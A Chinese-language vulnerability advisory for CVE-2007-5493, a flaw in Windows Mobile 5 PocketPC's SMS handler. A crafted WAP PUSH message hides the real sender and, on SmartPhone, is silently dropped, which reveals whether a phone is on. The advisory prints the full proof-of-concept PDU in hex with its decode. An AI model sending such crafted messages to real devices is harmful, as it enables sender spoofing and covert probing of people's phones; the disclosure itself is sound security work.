微软 Windows Mobile存在短信处理器来源迷惑漏洞

　　受影响系统：

　　Microsoft Windows Mobile 5 PocketPC

　　描述：

　　BUGTRAQ ID: 26091

　　CVE(CAN) ID: CVE-2007-5493

　　Windows Mobile是微软开发的用于手机的操作系统。

　　Windows Mobile的短信处理器中存在安全漏洞，如果发送了特制的WAP PUSH消息的话，就可能在接收者的手机上隐藏原始短信的发送者。

　　原始PDU如[1]所示，以下PDU会导致Pocket PC电话版本的SMS处理器错误的解码PDU，这样发送者的手机号码和发送时间都是错误的。

　　[1] PDU（自动换行）

　　079144775810065051220C914477619269060004A7600605040B8423F025060803AE81EA

　　AF82B48401056A0045C6070D0373796D616E7465630085010353796D616E7465630D0D62

　　756C6B534D532028556E726567697374657265642056657229202D204C6F6769784D6F62

　　696C652E636F6D000101

　　PDU的解码请见[2]。当SmartPhone接收到这条消息的时候，就会未经交互便将其丢弃，这也允许攻击者未经短信接收者确认便可以判断对方手机是否打开。

　　[2] PDU解码

　　PDU LENGTH IS 118 BYTES

　　ADDRESS OF DELIVERING SMSC

　　NUMBER IS : +447785016005

　　TYPE OF NR. : International

　　NPI : ISDN/Telephone (E.164/163)

　　MESSAGE HEADER FLAGS

　　MESSAGE TYPE : SMS SUBMIT

　　REJECT DUPLICATES : NO

　　VALIDITY PERIOD : RELATIVE

　　REPLY PATH : NO

　　USER DATA HEADER : PRESENT

　　REQ. STATUS REPORT : NO

　　MSG REFERENCE NR. : 34 (0x22)

　　DESTINATION ADDRESS

　　NUMBER IS : +447716299660

　　TYPE OF NR. : International

　　NPI : ISDN/Telephone (E.164/163)

　　PROTOCOL IDENTIFIER (0x00)

　　MESSAGE ENTITIES : SME-to-SME

　　PROTOCOL USED : Implicit / SC-specific

　　DATA CODING SCHEME (0x04)

　　AUTO-DELETION : OFF

　　COMPRESSION : OFF

　　MESSAGE CLASS : NONE

　　ALPHABET USED : 8bit data

　　VALIDITY OF MESSAGE : 24.0 hrs

　　USER DATA PART OF SM

　　USER DATA LENGTH : 96 octets

　　UDH LENGTH : 6 octets

　　UDH : 05 04 0B 84 23 F0

　　UDH ELEMENTS : 05 - Appl. port addressing 16bit

　　4 (0x04) Bytes Information Element

　　09200 : SOURCE port is: allocated by IANA

　　02948 : DESTINATION port is: allocated by IANA

　　--- DATA ----------------------

　　05 04 0B 84 23 F0

　　USER DATA (TEXT) : %®ê¯‚´„jEÆ

　　symantec…Symantec

　　bulkSMS (Unregistered Ver) -

　　LogixMobile.com

　　厂商补丁：

　　Microsoft

　　目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

　　http://www.microsoft.com/technet/security/